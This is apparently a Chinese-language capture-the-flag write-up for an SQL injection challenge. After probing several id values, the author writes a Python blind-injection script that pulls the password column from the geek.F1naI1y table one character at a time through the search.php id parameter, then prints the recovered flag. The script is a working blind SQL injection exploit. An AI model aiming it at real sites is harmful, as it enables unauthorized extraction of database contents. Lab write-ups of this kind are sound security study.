打开题目
sql注入,点击1试一下
点击2试一下
点击3试一下
点击4
点击5
id=6试一下
感觉是sql盲注了
编写脚本
import requests
import string
from time import sleep
url = "http://9da9cb18-3096-413a-9476-8a177ffec31a.node4.buuoj.cn:81/search.php?id=0\^({})"
如果为真时的关键字匹配
base = 'Click others'
盲注的字符集
chars = string.printable
inject = "ord(substr(reverse((SELECT(GROUP_CONCAT(password))FROM(geek.F1naI1y))),{},1))={}"
for i in range(1, 1000):
continue_ = False
for c in chars:
u = url.format(inject.format(i,ord(c)))
res = requests.get(u)
while res.status_code == 429:
sleep(1)
res = requests.get(u)
if base in res.text:
print(c,end='',flush=True)
continue_ = True
break
if not continue_:
break(参考博客)
得到flag倒序,更正为
得到flag
flag{87c0b617-4e80-4135-b08c-ad013c856e27}
、